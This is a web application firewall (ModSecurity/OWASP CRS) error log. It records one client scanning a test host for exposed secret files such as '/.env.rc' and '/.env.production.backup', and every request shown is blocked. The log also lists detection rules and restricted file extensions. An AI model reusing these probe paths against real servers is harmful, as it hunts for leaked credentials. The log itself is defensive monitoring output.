[Fri Jan 16 03:21:34.394021 2026] [:error] [pid 1444035] [client 45.148.10.246:50018] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.alpha/"] [unique_id "aWmgrrauW6yeGWXfDeFYhAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.alpha/
[Fri Jan 16 03:21:34.394187 2026] [:error] [pid 1444035] [client 45.148.10.246:50018] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.alpha/"] [unique_id "aWmgrrauW6yeGWXfDeFYhAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.alpha/
[Fri Jan 16 03:21:34.573947 2026] [:error] [pid 1444034] [client 45.148.10.246:50022] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.alpha"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.alpha"] [unique_id "aWmgruRfEYyDES-ZFL4iwgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.alpha
[Fri Jan 16 03:21:34.574171 2026] [:error] [pid 1444034] [client 45.148.10.246:50022] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.alpha"] [unique_id "aWmgruRfEYyDES-ZFL4iwgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.alpha
[Fri Jan 16 03:21:34.574332 2026] [:error] [pid 1444034] [client 45.148.10.246:50022] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.alpha"] [unique_id "aWmgruRfEYyDES-ZFL4iwgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.alpha
[Fri Jan 16 03:21:34.720319 2026] [:error] [pid 1444226] [client 45.148.10.246:50028] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.alpha"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.alpha"] [unique_id "aWmgrmcpoCUgeFICb0bf_QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./.env.alpha
[Fri Jan 16 03:21:34.720556 2026] [:error] [pid 1444226] [client 45.148.10.246:50028] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.alpha"] [unique_id "aWmgrmcpoCUgeFICb0bf_QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./.env.alpha
[Fri Jan 16 03:21:34.720717 2026] [:error] [pid 1444226] [client 45.148.10.246:50028] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.alpha"] [unique_id "aWmgrmcpoCUgeFICb0bf_QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./.env.alpha
[Fri Jan 16 03:21:34.886030 2026] [:error] [pid 1444032] [client 45.148.10.246:50034] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.rc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.rc"] [unique_id "aWmgrukMvq8uPO2ZciWrWQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.rc
[Fri Jan 16 03:21:34.886249 2026] [:error] [pid 1444032] [client 45.148.10.246:50034] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.rc"] [unique_id "aWmgrukMvq8uPO2ZciWrWQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.rc
[Fri Jan 16 03:21:34.886433 2026] [:error] [pid 1444032] [client 45.148.10.246:50034] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.rc"] [unique_id "aWmgrukMvq8uPO2ZciWrWQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.rc
[Fri Jan 16 03:21:35.113975 2026] [:error] [pid 1444040] [client 45.148.10.246:50050] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.rc/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.rc/"] [unique_id "aWmgr_n_5sIyKhJ5GAza6wAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.rc/
[Fri Jan 16 03:21:35.114201 2026] [:error] [pid 1444040] [client 45.148.10.246:50050] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.rc/"] [unique_id "aWmgr_n_5sIyKhJ5GAza6wAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.rc/
[Fri Jan 16 03:21:35.114381 2026] [:error] [pid 1444040] [client 45.148.10.246:50050] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.rc/"] [unique_id "aWmgr_n_5sIyKhJ5GAza6wAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.rc/
[Fri Jan 16 03:21:35.240056 2026] [:error] [pid 1444031] [client 45.148.10.246:50056] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.rc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.rc"] [unique_id "aWmgr3-9MmrgwjmYTAJT3gAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env.rc
[Fri Jan 16 03:21:35.240278 2026] [:error] [pid 1444031] [client 45.148.10.246:50056] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.rc"] [unique_id "aWmgr3-9MmrgwjmYTAJT3gAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env.rc
[Fri Jan 16 03:21:35.240446 2026] [:error] [pid 1444031] [client 45.148.10.246:50056] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.rc"] [unique_id "aWmgr3-9MmrgwjmYTAJT3gAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//.env.rc
[Fri Jan 16 03:21:35.400799 2026] [:error] [pid 1444035] [client 45.148.10.246:50068] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.rc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.rc"] [unique_id "aWmgr7auW6yeGWXfDeFYhQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./.env.rc
[Fri Jan 16 03:21:35.401026 2026] [:error] [pid 1444035] [client 45.148.10.246:50068] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.rc"] [unique_id "aWmgr7auW6yeGWXfDeFYhQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./.env.rc
[Fri Jan 16 03:21:35.401189 2026] [:error] [pid 1444035] [client 45.148.10.246:50068] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.rc"] [unique_id "aWmgr7auW6yeGWXfDeFYhQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./.env.rc
[Fri Jan 16 03:21:35.558521 2026] [:error] [pid 1444034] [client 45.148.10.246:50072] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.backup"] [unique_id "aWmgr-RfEYyDES-ZFL4iwwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.production.backup
[Fri Jan 16 03:21:35.558679 2026] [:error] [pid 1444034] [client 45.148.10.246:50072] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.backup"] [unique_id "aWmgr-RfEYyDES-ZFL4iwwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.production.backup
[Fri Jan 16 03:21:35.558899 2026] [:error] [pid 1444034] [client 45.148.10.246:50072] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.backup"] [unique_id "aWmgr-RfEYyDES-ZFL4iwwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.production.backup
[Fri Jan 16 03:21:35.559070 2026] [:error] [pid 1444034] [client 45.148.10.246:50072] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.backup"] [unique_id "aWmgr-RfEYyDES-ZFL4iwwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.production.backup
[Fri Jan 16 03:21:35.715656 2026] [:error] [pid 1444226] [client 45.148.10.246:50082] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.backup/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.backup/"] [unique_id "aWmgr2cpoCUgeFICb0bf_gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.production.backup/
[Fri Jan 16 03:21:35.715909 2026] [:error] [pid 1444226] [client 45.148.10.246:50082] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.backup/"] [unique_id "aWmgr2cpoCUgeFICb0bf_gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.production.backup/
[Fri Jan 16 03:21:35.716093 2026] [:error] [pid 1444226] [client 45.148.10.246:50082] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.backup/"] [unique_id "aWmgr2cpoCUgeFICb0bf_gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.production.backup/
[Fri Jan 16 03:21:35.962536 2026] [:error] [pid 1444032] [client 45.148.10.246:50084] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.backup"] [unique_id "aWmgr-kMvq8uPO2ZciWrWgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.production.backup
[Fri Jan 16 03:21:35.962676 2026] [:error] [pid 1444032] [client 45.148.10.246:50084] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.backup"] [unique_id "aWmgr-kMvq8uPO2ZciWrWgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.production.backup
[Fri Jan 16 03:21:35.962892 2026] [:error] [pid 1444032] [client 45.148.10.246:50084] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.backup"] [unique_id "aWmgr-kMvq8uPO2ZciWrWgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.production.backup
[Fri Jan 16 03:21:35.963050 2026] [:error] [pid 1444032] [client 45.148.10.246:50084] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.backup"] [unique_id "aWmgr-kMvq8uPO2ZciWrWgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.production.backup
[Fri Jan 16 03:21:36.113312 2026] [:error] [pid 1444040] [client 45.148.10.246:50086] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.backup"] [unique_id "aWmgsPn_5sIyKhJ5GAza7AAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.production.backup
[Fri Jan 16 03:21:36.113455 2026] [:error] [pid 1444040] [client 45.148.10.246:50086] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.backup"] [unique_id "aWmgsPn_5sIyKhJ5GAza7AAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.production.backup
[Fri Jan 16 03:21:36.113671 2026] [:error] [pid 1444040] [client 45.148.10.246:50086] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.backup"] [unique_id "aWmgsPn_5sIyKhJ5GAza7AAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.production.backup
[Fri Jan 16 03:21:36.113834 2026] [:error] [pid 1444040] [client 45.148.10.246:50086] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.backup"] [unique_id "aWmgsPn_5sIyKhJ5GAza7AAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.production.backup
